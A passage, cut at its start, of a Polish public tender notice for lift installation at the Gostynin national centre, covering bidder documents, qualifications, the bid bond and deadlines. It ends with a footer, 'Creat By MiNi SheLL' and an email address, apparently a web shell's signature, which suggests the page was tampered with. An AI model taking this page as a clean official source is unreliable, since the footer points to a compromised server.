lub zachodzą wobec tego Podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten Podmiot innym Podmiotem lub Podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>- Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację Podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji Podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W przypadku polegania na zdolnościach lub sytuacji Podmiotów udostępniających zasoby, Wykonawca przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 Ustawy Pzp, także oświadczenie Podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego Podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>2. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, Zamawiający żąda od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. <br/>3. Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 Ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu Ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2024r., poz. 1616), z innym Wykonawcą, który złożył odrębną ofertę w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>4. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 Ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. <br/>5. Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawca, który polega na zdolnościach lub sytuacji Podmiotów udostępniających zasoby, musi udowodnić Zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi zasobami tych Podmiotów poprzez złożenie wraz z ofertą zobowiązania Podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub złożyć inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych Podmiotów.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <br/>3. Wykonawca złoży wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwóch zamówień w zakresie montażu lub wymiany dźwigu osobowo-towarowego w budynku mieszkalnym, wielorodzinnym lub obiekcie użyteczności publicznej wraz z konserwacją i należytym serwisowaniem w okresie gwarancji o wartości co najmniej 120.000,00 złotych brutto każda, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>4. Wykonawca złoży wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, tj. minimum jednej osoby przewidzianej do pełnienia funkcji:<br/>- Kierownika budowy posiadającego uprawnienia w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne równoważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa, zgodnie z Ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2025r. poz. 418) wraz z ważnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego oraz posiadającą co najmniej 3-letnie doświadczenie zawodowe, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. <br/>- osoby posiadającej uprawnienia kwalifikacyjne typu E i D do 1 kV oraz posiadającą co najmniej 3-letnie doświadczenie zawodowe w zakresie instalowanych urządzeń wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Za uprawnienia odpowiadające wyżej określonym, uznane zostaną uprawnienia, które wydane zostały na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu – EFTA (strony umowy o Europejskim Obszarze Gospodarczym), z zastrzeżeniem art. 12a oraz innych przepisów Ustawy z dnia 07 lipca 1994r. Prawo budowlane (Dz. U. z 2025r. poz. 418) oraz Ustawy z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2023r. poz. 334).<br/>5. Wykonawca złoży polisę ubezpieczenia, potwierdzającą, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na czas realizacji prac objętych umową, przy czym kwota tego ubezpieczenia nie może być mniejsza niż 300.000,00 złotych.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty Wykonawca dołącza formularz ofertowy z wykorzystaniem wzoru.<br/>2. Wykonawca dołącza do oferty potwierdzenie wniesienia przez Wykonawcę wadium na warunkach określonych w punkcie XXVIII SWZ. <br/>3. W celu potwierdzenia akceptacji przez Wykonawcę warunków realizacji zamówienia zawartych we wzorze umowy, Wykonawca załączy do oferty parafowane przez Wykonawcę projektowane postanowienia umowy. <br/>4. Do oferty Wykonawca dołączy oświadczenia i/lub dokumenty, na podstawie których Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji – jeżeli Wykonawca dokonuje zastrzeżenia takich informacji – wskazane jest wyodrębnienie wskazanych dokumentów, tj. Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości 2.500,00 złotych (słownie: dwa tysiące pięćset złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i za wyjątkami przewidzianymi w Ustawie Pzp utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą.<br/>3. Wadium należy wnieść w jednej z form wskazanej w art. 97 ust. 7 Ustawy Pzp.<br/>4. Wadium wnoszone w pieniądzu należy wnieść przelewem na konto Krajowego Ośrodka Zapobiegania Zachowaniom Dyssocjalnym w Gostyninie 87 1020 3974 0000 5202 0273 2485. <br/>- za termin wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku Zamawiającego. <br/>5. Wadium wnoszone w formie gwarancji lub poręczenia musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w Ustawie Pzp,<br/>2) z ich treści powinno jednoznacznie wynikać zobowiązanie Gwaranta do zapłaty całej kwoty wadium,<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie,<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż pierwszym dniem terminu związania ofertą jest dzień, w którym upływa termin składania ofert),<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania,<br/>6) Beneficjentem poręczenia lub gwarancji jest Krajowy Ośrodek Zapobiegania Zachowaniom Dyssocjalnym w Gostyninie, <br/>7) w przypadku Wykonawców wspólnie ubiegających się o zamówienie, Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią wszystkich Wykonawców wspólnie ubiegających się o zamówienie lub aby z jej treści wynikało, że wadium zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>6. Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie, do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt. 3 Ustawy Pzp, zostanie odrzucona. <br/>7. Zwrot oraz utrata wadium następuje zgodnie z art. 98 Ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>1) Pełnomocnictwo powinno być załączone do oferty jako dokument <br/>w postaci elektronicznej składany pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osobę/osoby uprawnione. <br/>2. Wszelka korespondencja prowadzona będzie wyłącznie z Podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia. <br/>3. Przepisy Ustawy Pzp dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>4. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie przed zawarciem umowy w sprawie zamówienia publicznego żądać kopii umowy regulującej współpracę tych Wykonawców. <br/>5. W przypadku wspólnego ubiegania się o zamówienie oświadczenie, <br/>o którym mowa w pkt. XXII pkt. 2 ppkt. 1 SWZ składa każdy <br/>z Wykonawców – oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>6. Pozostałe oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>7. Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu składa każdy z Wykonawców w zakresie, w jakim wykazuje spełnianie tych warunków. <br/>8. W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunki udziału w postępowaniu zostaną spełnione, jeżeli chociaż jeden <br/>z Wykonawców spełnia warunek samodzielnie lub warunek ten został spełniony przez podmioty łącznie. <br/>9. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>10. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <br/>11. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres zmian został opisany przez Zamawiającego w projektowanych postanowieniach umowy §15 - załącznik nr 10 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć za pośrednictwem Platformy przetargowej Zamawiającego dostępnej pod adresem: https://kozzd-gostynin.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-30 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania wyklucza się Wykonawców, którzy podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 Ustawy z dnia 11 września 2019r. Prawo zamówień publicznych oraz Wykonawców co do których zachodzą przesłanki wykluczenia na podstawie art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <br/>2. Przy warunkach finansowania i płatności mają zastosowanie przepisy Ustawy z dnia 9 listopada 2018r. o elektronicznym fakturowaniu w zamówieniach publicznych, koncesjach na roboty budowlane lub usługi oraz partnerstwie publiczno - prywatnym (Dz. U. z 2020r., poz. 1666 z późn. zm.), w zakresie ustrukturyzowanych faktur elektronicznych. <br/>3. Zamawiający informuje, iż z procedurą dokonywania zgłoszeń naruszeń prawa i podejmowanych działań następczych obowiązujących u Zamawiającego można zapoznać się na stronie internetowej Krajowego Ośrodka Zapobiegania Zachowaniom Dyssocjalnym w Gostyninie pod adresem http://kozzd-gostynin.bip.eur.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com